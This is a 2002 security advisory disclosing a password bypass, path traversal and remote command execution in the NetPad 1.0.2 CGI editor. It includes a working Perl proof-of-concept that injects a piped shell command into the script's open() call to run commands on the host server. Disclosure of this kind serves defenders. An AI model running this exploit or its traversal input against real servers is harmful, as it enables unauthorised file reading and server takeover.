LevCGI.coms NetPad 1.0.2 multiple vulnerabilities

["BrainRawt ." <brainrawt () hotmail com>]

Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities Advisory
Discovered By b0iler(b0iler () hotmail com) and 
BrainRawt(brainrawt () hotmail com)

About Netpad:
------------------
<quote from levcgi.com>

Easy to install and use text editor for your web browser! This NotePad like
program allows you to open your files and pages online in your browser and
edit their contents through the browser without forcing you to re-upload
your changes all the time! Extremely effecient and a must have tool for all
webmasters!

</quote from levcgi.com>

According to the website,  ...NetPad has been downloaded 1225 times!


Vulnerable (tested) Versions:
--------------------
NetPad v 1.0.2


Vendor Contact:
----------------
4-28-02 - Emailed lev () taintedthoughts com


Vulnerabilities:

-- Password Bypass

1. The website claims "password security feature to prevent unauthorized 
access!",
   but this is NOT true.

   A password is not required to read files.  It is only required to write 
to files.

-- Path Traversal

2. Improper filtering of input allows one to enter the traditional 
"../../../" into
   the input field to crawl back through directories of the server hosting 
netpad.cgi,
   allowing one to view any file readable by the webserver.

-- Command Execution

3. Due to improper usage of the open() function and input filtering, it is 
possible
   for a malicious visitor to remotely execute commands on the server 
hosting
   netpad.cgi

   Proof of Concept code can be found below............

Remote Command Execution Exploit (POC):
---------------------------------------

#!/usr/bin/perl
# exploit for levcgi's NetPad 1.0.2
#
# This could easily be done with any browser and alittle effort.
#
# requires LWP avaliable at
# http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
# also, the number of ../'s differs.  It depends on what $basedir
# is set to in the netpad.cgi script
#
# usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi 
../../../../bin/command

use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("your open call can be exploited" . $ua->agent);

my $req = new HTTP::Request POST => $ARGV[0];
$req->content_type('application/x-www-form-urlencoded');
foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }
$req->content("proc=open&of=${of}|");

my $res = $ua->request($req);
if ($res->is_success) { print $res->content . "\n\nit should have 
worked.\n"; }
else {  print "request failed.\n"; }

Fix:
------

No matter how well one filters input to this program, we recommend that the
program itself be protected by htaccess.

--------------------------------------------------------------------------
Did you (Lev) say something about stupid people doing stupid things? - 
BrainRawt


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com